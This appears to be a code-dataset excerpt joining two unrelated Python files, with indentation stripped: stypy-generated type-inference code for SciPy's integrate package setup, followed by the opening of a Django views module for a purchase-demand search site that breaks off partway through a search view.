module_type_store.set_type_of(stypy.reporting.localization.Localization(__file__, 42, 4), 'include_dirs', list_32202)
str_32215 = get_builtin_python_type_instance(stypy.reporting.localization.Localization(__file__, 43, 7), 'str', 'include_dirs')
# Getting the type of 'lapack_opt' (line 43)
lapack_opt_32216 = module_type_store.get_type_of(stypy.reporting.localization.Localization(__file__, 43, 25), 'lapack_opt')
# Applying the binary operator 'in' (line 43)
result_contains_32217 = python_operator(stypy.reporting.localization.Localization(__file__, 43, 7), 'in', str_32215, lapack_opt_32216)
# Testing the type of an if condition (line 43)
if_condition_32218 = is_suitable_condition(stypy.reporting.localization.Localization(__file__, 43, 4), result_contains_32217)
# Assigning a type to the variable 'if_condition_32218' (line 43)
module_type_store.set_type_of(stypy.reporting.localization.Localization(__file__, 43, 4), 'if_condition_32218', if_condition_32218)
# SSA begins for if statement (line 43)
module_type_store = SSAContext.create_ssa_context(module_type_store, 'if')
# Assigning a Call to a Name (line 44):
# Call to dict(...): (line 44)
# Processing the call arguments (line 44)
# Getting the type of 'lapack_opt' (line 44)
lapack_opt_32220 = module_type_store.get_type_of(stypy.reporting.localization.Localization(__file__, 44, 26), 'lapack_opt', False)
# Processing the call keyword arguments (line 44)
kwargs_32221 = {}
# Getting the type of 'dict' (line 44)
dict_32219 = module_type_store.get_type_of(stypy.reporting.localization.Localization(__file__, 44, 21), 'dict', False)
# Calling dict(args, kwargs) (line 44)
dict_call_result_32222 = invoke(stypy.reporting.localization.Localization(__file__, 44, 21), dict_32219, *[lapack_opt_32220], **kwargs_32221)
# Assigning a type to the variable 'lapack_opt' (line 44)
module_type_store.set_type_of(stypy.reporting.localization.Localization(__file__, 44, 8), 'lapack_opt', dict_call_result_32222)
# Call to extend(...): (line 45)
# Processing the call arguments (line 45)
# Call to pop(...): (line 45)
# Processing the call arguments (line 45)
str_32227 = get_builtin_python_type_instance(stypy.reporting.localization.Localization(__file__, 45, 43), 'str', 'include_dirs')
# Processing the call keyword arguments (line 45)
kwargs_32228 = {}
# Getting the type of 'lapack_opt' (line 45)
lapack_opt_32225 = module_type_store.get_type_of(stypy.reporting.localization.Localization(__file__, 45, 28), 'lapack_opt', False)
# Obtaining the member 'pop' of a type (line 45)
pop_32226 = module_type_store.get_type_of_member(stypy.reporting.localization.Localization(__file__, 45, 28), lapack_opt_32225, 'pop')
# Calling pop(args, kwargs) (line 45)
pop_call_result_32229 = invoke(stypy.reporting.localization.Localization(__file__, 45, 28), pop_32226, *[str_32227], **kwargs_32228)
# Processing the call keyword arguments (line 45)
kwargs_32230 = {}
# Getting the type of 'include_dirs' (line 45)
include_dirs_32223 = module_type_store.get_type_of(stypy.reporting.localization.Localization(__file__, 45, 8), 'include_dirs', False)
# Obtaining the member 'extend' of a type (line 45)
extend_32224 = module_type_store.get_type_of_member(stypy.reporting.localization.Localization(__file__, 45, 8), include_dirs_32223, 'extend')
# Calling extend(args, kwargs) (line 45)
extend_call_result_32231 = invoke(stypy.reporting.localization.Localization(__file__, 45, 8), extend_32224, *[pop_call_result_32229], **kwargs_32230)
# SSA join for if statement (line 43)
module_type_store = module_type_store.join_ssa_context()
# Call to add_extension(...): (line 47)
# Processing the call arguments (line 47)
str_32234 = get_builtin_python_type_instance(stypy.reporting.localization.Localization(__file__, 47, 25), 'str', '_quadpack')
# Processing the call keyword arguments (line 47)
# Obtaining an instance of the builtin type 'list' (line 48)
list_32235 = get_builtin_python_type_instance(stypy.reporting.localization.Localization(__file__, 48, 33), 'list')
# Adding type elements to the builtin type 'list' instance (line 48)
# Adding element type (line 48)
str_32236 = get_builtin_python_type_instance(stypy.reporting.localization.Localization(__file__, 48, 34), 'str', '_quadpackmodule.c')
add_contained_elements_type(stypy.reporting.localization.Localization(__file__, 48, 33), list_32235, str_32236)
keyword_32237 = list_32235
# Obtaining an instance of the builtin type 'list' (line 49)
list_32238 = get_builtin_python_type_instance(stypy.reporting.localization.Localization(__file__, 49, 35), 'list')
# Adding type elements to the builtin type 'list' instance (line 49)
# Adding element type (line 49)
str_32239 = get_builtin_python_type_instance(stypy.reporting.localization.Localization(__file__, 49, 36), 'str', 'quadpack')
add_contained_elements_type(stypy.reporting.localization.Localization(__file__, 49, 35), list_32238, str_32239)
# Adding element type (line 49)
str_32240 = get_builtin_python_type_instance(stypy.reporting.localization.Localization(__file__, 49, 48), 'str', 'mach')
add_contained_elements_type(stypy.reporting.localization.Localization(__file__, 49, 35), list_32238, str_32240)
# Getting the type of 'lapack_libs' (line 49)
lapack_libs_32241 = module_type_store.get_type_of(stypy.reporting.localization.Localization(__file__, 49, 58), 'lapack_libs', False)
# Applying the binary operator '+' (line 49)
result_add_32242 = python_operator(stypy.reporting.localization.Localization(__file__, 49, 35), '+', list_32238, lapack_libs_32241)
keyword_32243 = result_add_32242
# Obtaining an instance of the builtin type 'list' (line 50)
list_32244 = get_builtin_python_type_instance(stypy.reporting.localization.Localization(__file__, 50, 34), 'list')
# Adding type elements to the builtin type 'list' instance (line 50)
# Adding element type (line 50)
str_32245 = get_builtin_python_type_instance(stypy.reporting.localization.Localization(__file__, 50, 35), 'str', '__quadpack.h')
add_contained_elements_type(stypy.reporting.localization.Localization(__file__, 50, 34), list_32244, str_32245)
# Getting the type of 'quadpack_src' (line 51)
quadpack_src_32246 = module_type_store.get_type_of(stypy.reporting.localization.Localization(__file__, 51, 36), 'quadpack_src', False)
# Applying the binary operator '+' (line 50)
result_add_32247 = python_operator(stypy.reporting.localization.Localization(__file__, 50, 34), '+', list_32244, quadpack_src_32246)
# Getting the type of 'mach_src' (line 51)
mach_src_32248 = module_type_store.get_type_of(stypy.reporting.localization.Localization(__file__, 51, 51), 'mach_src', False)
# Applying the binary operator '+' (line 51)
result_add_32249 = python_operator(stypy.reporting.localization.Localization(__file__, 51, 49), '+', result_add_32247, mach_src_32248)
keyword_32250 = result_add_32249
# Getting the type of 'include_dirs' (line 52)
include_dirs_32251 = module_type_store.get_type_of(stypy.reporting.localization.Localization(__file__, 52, 38), 'include_dirs', False)
keyword_32252 = include_dirs_32251
# Getting the type of 'lapack_opt' (line 53)
lapack_opt_32253 = module_type_store.get_type_of(stypy.reporting.localization.Localization(__file__, 53, 27), 'lapack_opt', False)
kwargs_32254 = {'libraries': keyword_32243, 'sources': keyword_32237, 'depends': keyword_32250, 'lapack_opt_32253': lapack_opt_32253, 'include_dirs': keyword_32252}
# Getting the type of 'config' (line 47)
config_32232 = module_type_store.get_type_of(stypy.reporting.localization.Localization(__file__, 47, 4), 'config', False)
# Obtaining the member 'add_extension' of a type (line 47)
add_extension_32233 = module_type_store.get_type_of_member(stypy.reporting.localization.Localization(__file__, 47, 4), config_32232, 'add_extension')
# Calling add_extension(args, kwargs) (line 47)
add_extension_call_result_32255 = invoke(stypy.reporting.localization.Localization(__file__, 47, 4), add_extension_32233, *[str_32234], **kwargs_32254)
# Assigning a Call to a Name (line 56):
# Call to copy(...): (line 56)
# Processing the call keyword arguments (line 56)
kwargs_32258 = {}
# Getting the type of 'lapack_opt' (line 56)
lapack_opt_32256 = module_type_store.get_type_of(stypy.reporting.localization.Localization(__file__, 56, 19), 'lapack_opt', False)
# Obtaining the member 'copy' of a type (line 56)
copy_32257 = module_type_store.get_type_of_member(stypy.reporting.localization.Localization(__file__, 56, 19), lapack_opt_32256, 'copy')
# Calling copy(args, kwargs) (line 56)
copy_call_result_32259 = invoke(stypy.reporting.localization.Localization(__file__, 56, 19), copy_32257, *[], **kwargs_32258)
# Assigning a type to the variable 'odepack_opts' (line 56)
module_type_store.set_type_of(stypy.reporting.localization.Localization(__file__, 56, 4), 'odepack_opts', copy_call_result_32259)
# Call to update(...): (line 57)
# Processing the call arguments (line 57)
# Getting the type of 'numpy_nodepr_api' (line 57)
numpy_nodepr_api_32262 = module_type_store.get_type_of(stypy.reporting.localization.Localization(__file__, 57, 24), 'numpy_nodepr_api', False)
# Processing the call keyword arguments (line 57)
kwargs_32263 = {}
# Getting the type of 'odepack_opts' (line 57)
odepack_opts_32260 = module_type_store.get_type_of(stypy.reporting.localization.Localization(__file__, 57, 4), 'odepack_opts', False)
# Obtaining the member 'update' of a type (line 57)
update_32261 = module_type_store.get_type_of_member(stypy.reporting.localization.Localization(__file__, 57, 4), odepack_opts_32260, 'update')
# Calling update(args, kwargs) (line 57)
update_call_result_32264 = invoke(stypy.reporting.localization.Localization(__file__, 57, 4), update_32261, *[numpy_nodepr_api_32262], **kwargs_32263)
# Call to add_extension(...): (line 58)
# Processing the call arguments (line 58)
str_32267 = get_builtin_python_type_instance(stypy.reporting.localization.Localization(__file__, 58, 25), 'str', '_odepack')
# Processing the call keyword arguments (line 58)
# Obtaining an instance of the builtin type 'list' (line 59)
list_32268 = get_builtin_python_type_instance(stypy.reporting.localization.Localization(__file__, 59, 33), 'list')
# Adding type elements to the builtin type 'list' instance (line 59)
# Adding element type (line 59)
str_32269 = get_builtin_python_type_instance(stypy.reporting.localization.Localization(__file__, 59, 34), 'str', '_odepackmodule.c')
add_contained_elements_type(stypy.reporting.localization.Localization(__file__, 59, 33), list_32268, str_32269)
keyword_32270 = list_32268
# Obtaining an instance of the builtin type 'list' (line 60)
list_32271 = get_builtin_python_type_instance(stypy.reporting.localization.Localization(__file__, 60, 35), 'list')
# Adding type elements to the builtin type 'list' instance (line 60)
# Adding element type (line 60)
str_32272 = get_builtin_python_type_instance(stypy.reporting.localization.Localization(__file__, 60, 36), 'str', 'lsoda')
add_contained_elements_type(stypy.reporting.localization.Localization(__file__, 60, 35), list_32271, str_32272)
# Adding element type (line 60)
str_32273 = get_builtin_python_type_instance(stypy.reporting.localization.Localization(__file__, 60, 45), 'str', 'mach')
add_contained_elements_type(stypy.reporting.localization.Localization(__file__, 60, 35), list_32271, str_32273)
# Getting the type of 'lapack_libs' (line 60)
lapack_libs_32274 = module_type_store.get_type_of(stypy.reporting.localization.Localization(__file__, 60, 55), 'lapack_libs', False)
# Applying the binary operator '+' (line 60)
result_add_32275 = python_operator(stypy.reporting.localization.Localization(__file__, 60, 35), '+', list_32271, lapack_libs_32274)
keyword_32276 = result_add_32275
# Getting the type of 'lsoda_src' (line 61)
lsoda_src_32277 = module_type_store.get_type_of(stypy.reporting.localization.Localization(__file__, 61, 34), 'lsoda_src', False)
# Getting the type of 'mach_src' (line 61)
mach_src_32278 = module_type_store.get_type_of(stypy.reporting.localization.Localization(__file__, 61, 46), 'mach_src', False)
# Applying the binary operator '+' (line 61)
result_add_32279 = python_operator(stypy.reporting.localization.Localization(__file__, 61, 34), '+', lsoda_src_32277, mach_src_32278)
keyword_32280 = result_add_32279
# Getting the type of 'odepack_opts' (line 62)
odepack_opts_32281 = module_type_store.get_type_of(stypy.reporting.localization.Localization(__file__, 62, 27), 'odepack_opts', False)
kwargs_32282 = {'libraries': keyword_32276, 'sources': keyword_32270, 'depends': keyword_32280, 'odepack_opts_32281': odepack_opts_32281}
# Getting the type of 'config' (line 58)
config_32265 = module_type_store.get_type_of(stypy.reporting.localization.Localization(__file__, 58, 4), 'config', False)
# Obtaining the member 'add_extension' of a type (line 58)
add_extension_32266 = module_type_store.get_type_of_member(stypy.reporting.localization.Localization(__file__, 58, 4), config_32265, 'add_extension')
# Calling add_extension(args, kwargs) (line 58)
add_extension_call_result_32283 = invoke(stypy.reporting.localization.Localization(__file__, 58, 4), add_extension_32266, *[str_32267], **kwargs_32282)
# Call to add_extension(...): (line 65)
# Processing the call arguments (line 65)
str_32286 = get_builtin_python_type_instance(stypy.reporting.localization.Localization(__file__, 65, 25), 'str', 'vode')
# Processing the call keyword arguments (line 65)
# Obtaining an instance of the builtin type 'list' (line 66)
list_32287 = get_builtin_python_type_instance(stypy.reporting.localization.Localization(__file__, 66, 33), 'list')
# Adding type elements to the builtin type 'list' instance (line 66)
# Adding element type (line 66)
str_32288 = get_builtin_python_type_instance(stypy.reporting.localization.Localization(__file__, 66, 34), 'str', 'vode.pyf')
add_contained_elements_type(stypy.reporting.localization.Localization(__file__, 66, 33), list_32287, str_32288)
keyword_32289 = list_32287
# Obtaining an instance of the builtin type 'list' (line 67)
list_32290 = get_builtin_python_type_instance(stypy.reporting.localization.Localization(__file__, 67, 35), 'list')
# Adding type elements to the builtin type 'list' instance (line 67)
# Adding element type (line 67)
str_32291 = get_builtin_python_type_instance(stypy.reporting.localization.Localization(__file__, 67, 36), 'str', 'vode')
add_contained_elements_type(stypy.reporting.localization.Localization(__file__, 67, 35), list_32290, str_32291)
# Getting the type of 'lapack_libs' (line 67)
lapack_libs_32292 = module_type_store.get_type_of(stypy.reporting.localization.Localization(__file__, 67, 46), 'lapack_libs', False)
# Applying the binary operator '+' (line 67)
result_add_32293 = python_operator(stypy.reporting.localization.Localization(__file__, 67, 35), '+', list_32290, lapack_libs_32292)
keyword_32294 = result_add_32293
# Getting the type of 'vode_src' (line 68)
vode_src_32295 = module_type_store.get_type_of(stypy.reporting.localization.Localization(__file__, 68, 33), 'vode_src', False)
keyword_32296 = vode_src_32295
# Getting the type of 'lapack_opt' (line 69)
lapack_opt_32297 = module_type_store.get_type_of(stypy.reporting.localization.Localization(__file__, 69, 27), 'lapack_opt', False)
kwargs_32298 = {'libraries': keyword_32294, 'sources': keyword_32289, 'depends': keyword_32296, 'lapack_opt_32297': lapack_opt_32297}
# Getting the type of 'config' (line 65)
config_32284 = module_type_store.get_type_of(stypy.reporting.localization.Localization(__file__, 65, 4), 'config', False)
# Obtaining the member 'add_extension' of a type (line 65)
add_extension_32285 = module_type_store.get_type_of_member(stypy.reporting.localization.Localization(__file__, 65, 4), config_32284, 'add_extension')
# Calling add_extension(args, kwargs) (line 65)
add_extension_call_result_32299 = invoke(stypy.reporting.localization.Localization(__file__, 65, 4), add_extension_32285, *[str_32286], **kwargs_32298)
# Call to add_extension(...): (line 72)
# Processing the call arguments (line 72)
str_32302 = get_builtin_python_type_instance(stypy.reporting.localization.Localization(__file__, 72, 25), 'str', 'lsoda')
# Processing the call keyword arguments (line 72)
# Obtaining an instance of the builtin type 'list' (line 73)
list_32303 = get_builtin_python_type_instance(stypy.reporting.localization.Localization(__file__, 73, 33), 'list')
# Adding type elements to the builtin type 'list' instance (line 73)
# Adding element type (line 73)
str_32304 = get_builtin_python_type_instance(stypy.reporting.localization.Localization(__file__, 73, 34), 'str', 'lsoda.pyf')
add_contained_elements_type(stypy.reporting.localization.Localization(__file__, 73, 33), list_32303, str_32304)
keyword_32305 = list_32303
# Obtaining an instance of the builtin type 'list' (line 74)
list_32306 = get_builtin_python_type_instance(stypy.reporting.localization.Localization(__file__, 74, 35), 'list')
# Adding type elements to the builtin type 'list' instance (line 74)
# Adding element type (line 74)
str_32307 = get_builtin_python_type_instance(stypy.reporting.localization.Localization(__file__, 74, 36), 'str', 'lsoda')
add_contained_elements_type(stypy.reporting.localization.Localization(__file__, 74, 35), list_32306, str_32307)
# Adding element type (line 74)
str_32308 = get_builtin_python_type_instance(stypy.reporting.localization.Localization(__file__, 74, 45), 'str', 'mach')
add_contained_elements_type(stypy.reporting.localization.Localization(__file__, 74, 35), list_32306, str_32308)
# Getting the type of 'lapack_libs' (line 74)
lapack_libs_32309 = module_type_store.get_type_of(stypy.reporting.localization.Localization(__file__, 74, 55), 'lapack_libs', False)
# Applying the binary operator '+' (line 74)
result_add_32310 = python_operator(stypy.reporting.localization.Localization(__file__, 74, 35), '+', list_32306, lapack_libs_32309)
keyword_32311 = result_add_32310
# Getting the type of 'lsoda_src' (line 75)
lsoda_src_32312 = module_type_store.get_type_of(stypy.reporting.localization.Localization(__file__, 75, 34), 'lsoda_src', False)
# Getting the type of 'mach_src' (line 75)
mach_src_32313 = module_type_store.get_type_of(stypy.reporting.localization.Localization(__file__, 75, 46), 'mach_src', False)
# Applying the binary operator '+' (line 75)
result_add_32314 = python_operator(stypy.reporting.localization.Localization(__file__, 75, 34), '+', lsoda_src_32312, mach_src_32313)
keyword_32315 = result_add_32314
# Getting the type of 'lapack_opt' (line 76)
lapack_opt_32316 = module_type_store.get_type_of(stypy.reporting.localization.Localization(__file__, 76, 27), 'lapack_opt', False)
kwargs_32317 = {'libraries': keyword_32311, 'sources': keyword_32305, 'depends': keyword_32315, 'lapack_opt_32316': lapack_opt_32316}
# Getting the type of 'config' (line 72)
config_32300 = module_type_store.get_type_of(stypy.reporting.localization.Localization(__file__, 72, 4), 'config', False)
# Obtaining the member 'add_extension' of a type (line 72)
add_extension_32301 = module_type_store.get_type_of_member(stypy.reporting.localization.Localization(__file__, 72, 4), config_32300, 'add_extension')
# Calling add_extension(args, kwargs) (line 72)
add_extension_call_result_32318 = invoke(stypy.reporting.localization.Localization(__file__, 72, 4), add_extension_32301, *[str_32302], **kwargs_32317)
# Call to add_extension(...): (line 79)
# Processing the call arguments (line 79)
str_32321 = get_builtin_python_type_instance(stypy.reporting.localization.Localization(__file__, 79, 25), 'str', '_dop')
# Processing the call keyword arguments (line 79)
# Obtaining an instance of the builtin type 'list' (line 80)
list_32322 = get_builtin_python_type_instance(stypy.reporting.localization.Localization(__file__, 80, 33), 'list')
# Adding type elements to the builtin type 'list' instance (line 80)
# Adding element type (line 80)
str_32323 = get_builtin_python_type_instance(stypy.reporting.localization.Localization(__file__, 80, 34), 'str', 'dop.pyf')
add_contained_elements_type(stypy.reporting.localization.Localization(__file__, 80, 33), list_32322, str_32323)
keyword_32324 = list_32322
# Obtaining an instance of the builtin type 'list' (line 81)
list_32325 = get_builtin_python_type_instance(stypy.reporting.localization.Localization(__file__, 81, 35), 'list')
# Adding type elements to the builtin type 'list' instance (line 81)
# Adding element type (line 81)
str_32326 = get_builtin_python_type_instance(stypy.reporting.localization.Localization(__file__, 81, 36), 'str', 'dop')
add_contained_elements_type(stypy.reporting.localization.Localization(__file__, 81, 35), list_32325, str_32326)
keyword_32327 = list_32325
# Getting the type of 'dop_src' (line 82)
dop_src_32328 = module_type_store.get_type_of(stypy.reporting.localization.Localization(__file__, 82, 33), 'dop_src', False)
keyword_32329 = dop_src_32328
kwargs_32330 = {'libraries': keyword_32327, 'sources': keyword_32324, 'depends': keyword_32329}
# Getting the type of 'config' (line 79)
config_32319 = module_type_store.get_type_of(stypy.reporting.localization.Localization(__file__, 79, 4), 'config', False)
# Obtaining the member 'add_extension' of a type (line 79)
add_extension_32320 = module_type_store.get_type_of_member(stypy.reporting.localization.Localization(__file__, 79, 4), config_32319, 'add_extension')
# Calling add_extension(args, kwargs) (line 79)
add_extension_call_result_32331 = invoke(stypy.reporting.localization.Localization(__file__, 79, 4), add_extension_32320, *[str_32321], **kwargs_32330)
# Call to add_extension(...): (line 84)
# Processing the call arguments (line 84)
str_32334 = get_builtin_python_type_instance(stypy.reporting.localization.Localization(__file__, 84, 25), 'str', '_test_multivariate')
# Processing the call keyword arguments (line 84)
# Getting the type of 'quadpack_test_src' (line 85)
quadpack_test_src_32335 = module_type_store.get_type_of(stypy.reporting.localization.Localization(__file__, 85, 33), 'quadpack_test_src', False)
keyword_32336 = quadpack_test_src_32335
kwargs_32337 = {'sources': keyword_32336}
# Getting the type of 'config' (line 84)
config_32332 = module_type_store.get_type_of(stypy.reporting.localization.Localization(__file__, 84, 4), 'config', False)
# Obtaining the member 'add_extension' of a type (line 84)
add_extension_32333 = module_type_store.get_type_of_member(stypy.reporting.localization.Localization(__file__, 84, 4), config_32332, 'add_extension')
# Calling add_extension(args, kwargs) (line 84)
add_extension_call_result_32338 = invoke(stypy.reporting.localization.Localization(__file__, 84, 4), add_extension_32333, *[str_32334], **kwargs_32337)
# Call to add_extension(...): (line 88)
# Processing the call arguments (line 88)
str_32341 = get_builtin_python_type_instance(stypy.reporting.localization.Localization(__file__, 88, 25), 'str', '_test_odeint_banded')
# Processing the call keyword arguments (line 88)
# Getting the type of 'odeint_banded_test_src' (line 89)
odeint_banded_test_src_32342 = module_type_store.get_type_of(stypy.reporting.localization.Localization(__file__, 89, 33), 'odeint_banded_test_src', False)
keyword_32343 = odeint_banded_test_src_32342
# Obtaining an instance of the builtin type 'list' (line 90)
list_32344 = get_builtin_python_type_instance(stypy.reporting.localization.Localization(__file__, 90, 35), 'list')
# Adding type elements to the builtin type 'list' instance (line 90)
# Adding element type (line 90)
str_32345 = get_builtin_python_type_instance(stypy.reporting.localization.Localization(__file__, 90, 36), 'str', 'lsoda')
add_contained_elements_type(stypy.reporting.localization.Localization(__file__, 90, 35), list_32344, str_32345)
# Adding element type (line 90)
str_32346 = get_builtin_python_type_instance(stypy.reporting.localization.Localization(__file__, 90, 45), 'str', 'mach')
add_contained_elements_type(stypy.reporting.localization.Localization(__file__, 90, 35), list_32344, str_32346)
# Getting the type of 'lapack_libs' (line 90)
lapack_libs_32347 = module_type_store.get_type_of(stypy.reporting.localization.Localization(__file__, 90, 55), 'lapack_libs', False)
# Applying the binary operator '+' (line 90)
result_add_32348 = python_operator(stypy.reporting.localization.Localization(__file__, 90, 35), '+', list_32344, lapack_libs_32347)
keyword_32349 = result_add_32348
# Getting the type of 'lsoda_src' (line 91)
lsoda_src_32350 = module_type_store.get_type_of(stypy.reporting.localization.Localization(__file__, 91, 34), 'lsoda_src', False)
# Getting the type of 'mach_src' (line 91)
mach_src_32351 = module_type_store.get_type_of(stypy.reporting.localization.Localization(__file__, 91, 46), 'mach_src', False)
# Applying the binary operator '+' (line 91)
result_add_32352 = python_operator(stypy.reporting.localization.Localization(__file__, 91, 34), '+', lsoda_src_32350, mach_src_32351)
keyword_32353 = result_add_32352
# Getting the type of 'lapack_opt' (line 92)
lapack_opt_32354 = module_type_store.get_type_of(stypy.reporting.localization.Localization(__file__, 92, 27), 'lapack_opt', False)
kwargs_32355 = {'libraries': keyword_32349, 'sources': keyword_32343, 'depends': keyword_32353, 'lapack_opt_32354': lapack_opt_32354}
# Getting the type of 'config' (line 88)
config_32339 = module_type_store.get_type_of(stypy.reporting.localization.Localization(__file__, 88, 4), 'config', False)
# Obtaining the member 'add_extension' of a type (line 88)
add_extension_32340 = module_type_store.get_type_of_member(stypy.reporting.localization.Localization(__file__, 88, 4), config_32339, 'add_extension')
# Calling add_extension(args, kwargs) (line 88)
add_extension_call_result_32356 = invoke(stypy.reporting.localization.Localization(__file__, 88, 4), add_extension_32340, *[str_32341], **kwargs_32355)
# Call to add_subpackage(...): (line 94)
# Processing the call arguments (line 94)
str_32359 = get_builtin_python_type_instance(stypy.reporting.localization.Localization(__file__, 94, 26), 'str', '_ivp')
# Processing the call keyword arguments (line 94)
kwargs_32360 = {}
# Getting the type of 'config' (line 94)
config_32357 = module_type_store.get_type_of(stypy.reporting.localization.Localization(__file__, 94, 4), 'config', False)
# Obtaining the member 'add_subpackage' of a type (line 94)
add_subpackage_32358 = module_type_store.get_type_of_member(stypy.reporting.localization.Localization(__file__, 94, 4), config_32357, 'add_subpackage')
# Calling add_subpackage(args, kwargs) (line 94)
add_subpackage_call_result_32361 = invoke(stypy.reporting.localization.Localization(__file__, 94, 4), add_subpackage_32358, *[str_32359], **kwargs_32360)
# Call to add_data_dir(...): (line 96)
# Processing the call arguments (line 96)
str_32364 = get_builtin_python_type_instance(stypy.reporting.localization.Localization(__file__, 96, 24), 'str', 'tests')
# Processing the call keyword arguments (line 96)
kwargs_32365 = {}
# Getting the type of 'config' (line 96)
config_32362 = module_type_store.get_type_of(stypy.reporting.localization.Localization(__file__, 96, 4), 'config', False)
# Obtaining the member 'add_data_dir' of a type (line 96)
add_data_dir_32363 = module_type_store.get_type_of_member(stypy.reporting.localization.Localization(__file__, 96, 4), config_32362, 'add_data_dir')
# Calling add_data_dir(args, kwargs) (line 96)
add_data_dir_call_result_32366 = invoke(stypy.reporting.localization.Localization(__file__, 96, 4), add_data_dir_32363, *[str_32364], **kwargs_32365)
# Getting the type of 'config' (line 97)
config_32367 = module_type_store.get_type_of(stypy.reporting.localization.Localization(__file__, 97, 11), 'config')
# Assigning a type to the variable 'stypy_return_type' (line 97)
module_type_store.set_type_of(stypy.reporting.localization.Localization(__file__, 97, 4), 'stypy_return_type', config_32367)
# ################# End of 'configuration(...)' code ##################
# Teardown call information
teardown_call_information(localization, arguments)
# Storing the return type of function 'configuration' in the type store
# Getting the type of 'stypy_return_type' (line 9)
stypy_return_type_32368 = module_type_store.get_type_of(stypy.reporting.localization.Localization(__file__, 9, 0), 'stypy_return_type')
module_type_store.store_return_type_of_current_context(stypy_return_type_32368)
# Destroy the current context
module_type_store = module_type_store.close_function_context()
# Return type of the function 'configuration'
return stypy_return_type_32368
# Assigning a type to the variable 'configuration' (line 9)
module_type_store.set_type_of(stypy.reporting.localization.Localization(__file__, 9, 0), 'configuration', configuration)
if (__name__ == '__main__'):
stypy.reporting.localization.Localization.set_current(stypy.reporting.localization.Localization(__file__, 101, 4))
# 'from numpy.distutils.core import setup' statement (line 101)
update_path_to_current_file_folder('C:/Python27/lib/site-packages/scipy/integrate/')
import_32369 = generate_type_inference_code_for_module(stypy.reporting.localization.Localization(__file__, 101, 4), 'numpy.distutils.core')
if (type(import_32369) is not StypyTypeError):
if (import_32369 != 'pyd_module'):
__import__(import_32369)
sys_modules_32370 = sys.modules[import_32369]
import_from_module(stypy.reporting.localization.Localization(__file__, 101, 4), 'numpy.distutils.core', sys_modules_32370.module_type_store, module_type_store, ['setup'])
nest_module(stypy.reporting.localization.Localization(__file__, 101, 4), __file__, sys_modules_32370, sys_modules_32370.module_type_store, module_type_store)
else:
from numpy.distutils.core import setup
import_from_module(stypy.reporting.localization.Localization(__file__, 101, 4), 'numpy.distutils.core', None, module_type_store, ['setup'], [setup])
else:
# Assigning a type to the variable 'numpy.distutils.core' (line 101)
module_type_store.set_type_of(stypy.reporting.localization.Localization(__file__, 101, 4), 'numpy.distutils.core', import_32369)
remove_current_file_folder_from_path('C:/Python27/lib/site-packages/scipy/integrate/')
# Call to setup(...): (line 102)
# Processing the call keyword arguments (line 102)
# Call to todict(...): (line 102)
# Processing the call keyword arguments (line 102)
kwargs_32378 = {}
# Call to configuration(...): (line 102)
# Processing the call keyword arguments (line 102)
str_32373 = get_builtin_python_type_instance(stypy.reporting.localization.Localization(__file__, 102, 35), 'str', '')
keyword_32374 = str_32373
kwargs_32375 = {'top_path': keyword_32374}
# Getting the type of 'configuration' (line 102)
configuration_32372 = module_type_store.get_type_of(stypy.reporting.localization.Localization(__file__, 102, 12), 'configuration', False)
# Calling configuration(args, kwargs) (line 102)
configuration_call_result_32376 = invoke(stypy.reporting.localization.Localization(__file__, 102, 12), configuration_32372, *[], **kwargs_32375)
# Obtaining the member 'todict' of a type (line 102)
todict_32377 = module_type_store.get_type_of_member(stypy.reporting.localization.Localization(__file__, 102, 12), configuration_call_result_32376, 'todict')
# Calling todict(args, kwargs) (line 102)
todict_call_result_32379 = invoke(stypy.reporting.localization.Localization(__file__, 102, 12), todict_32377, *[], **kwargs_32378)
kwargs_32380 = {'todict_call_result_32379': todict_call_result_32379}
# Getting the type of 'setup' (line 102)
setup_32371 = module_type_store.get_type_of(stypy.reporting.localization.Localization(__file__, 102, 4), 'setup', False)
# Calling setup(args, kwargs) (line 102)
setup_call_result_32381 = invoke(stypy.reporting.localization.Localization(__file__, 102, 4), setup_32371, *[], **kwargs_32380)
# ################# End of the type inference program ##################
module_errors = stypy.errors.type_error.StypyTypeError.get_error_msgs()
module_warnings = stypy.errors.type_warning.TypeWarning.get_warning_msgs()
|
7,964 | fb16009985ee7fe4a467a94160f593723b5aaf03 | # -*- coding: utf-8 -*-
from django.http import Http404
from django.shortcuts import render,render_to_response, get_object_or_404, redirect, HttpResponse
from django.core.context_processors import csrf
from django.views.decorators.csrf import csrf_protect, csrf_exempt
from django.template import RequestContext,Context
from django.template.loader import get_template
import os, sys
from newchama import settings
from newchama.helper import member_login_required
from xhtml2pdf import pisa
import StringIO
import datetime
from services.models import Deal,CompanyWithPE,Demand, Country, Industry, Member, Company, StatusDemand, Province, City, DemandAttach, DemandIndustry, InvestmentCompany, DemandOtherTargetCompany, ListedCompany
from services.models import DemandViewLog, Message, DemandViewLog, Favorites, TypeFavorite, DemandVisitor, Project,News, StatusProject,Preference, PreferenceIndustry, PreferenceLocation, PreferenceKeyword
from services.models import ConditionDemand, DemandKeyword, DemandKeywordEn
from services.helper import Helper
from recommond.views import update_project_recommond_list
from recommond.models import RecommondProjectItem
from django.utils.translation import ugettext_lazy as _
from django.contrib import messages
import logging
import random
import zipfile
from django.db.models import Q, Sum, connection
from sets import Set as set
from django.utils import simplejson
from log.views import *
logger = logging.getLogger(__name__)
@member_login_required
def addsuccess(request):
c = {}
c['title'] = _("Buyer Recommended")
c['member'] = request.session.get('member', None)
return render_to_response("purchase/"+request.lang+"/add_success.html", c, context_instance=RequestContext(request))
def _is_has_condition(condition):
return condition != "" and condition != "0"
@member_login_required
def search(request):
c = {}
c.update(request)
c['title'] = _("Purchase Search")
c['member'] = request.session.get('member', None)
member_id = request.session['member']['id']
is_search = request.GET.get("is_search", "")
if is_search == '1':
is_has_condition = False
condition = ConditionDemand()
condition.status = StatusDemand.approved
demands = Demand.objects.filter(status=StatusDemand.approved)
keyword = request.GET.get("keyword", "")
country = request.GET.get("country", "")
#province = request.GET.get("province", "")
#city = request.GET.get("city", "")
type = request.GET.get("type", "")
industry_first = request.GET.get("industry_first", "")
industry_second = request.GET.get("industry_second", "")
industry_third = request.GET.get("industry_third", "")
if keyword != "":
c["keyword"] = keyword
is_has_condition = True
if type != "":
c["type"] = int(type)
is_has_condition = True
country_id = 0
#province_id = 0
#city_id = 0
if _is_has_condition(country):
country_id = int(country)
c["country"] = country_id
is_has_condition = True
industry = ""
if _is_has_condition(industry_first):
industry = industry_first
c["industry_first"] = int(industry_first)
if _is_has_condition(industry_second):
industry = industry_second
c["industry_second"] = int(industry_second)
if _is_has_condition(industry_third):
industry = industry_third
c["industry_third"] = int(industry_third)
if industry != "":
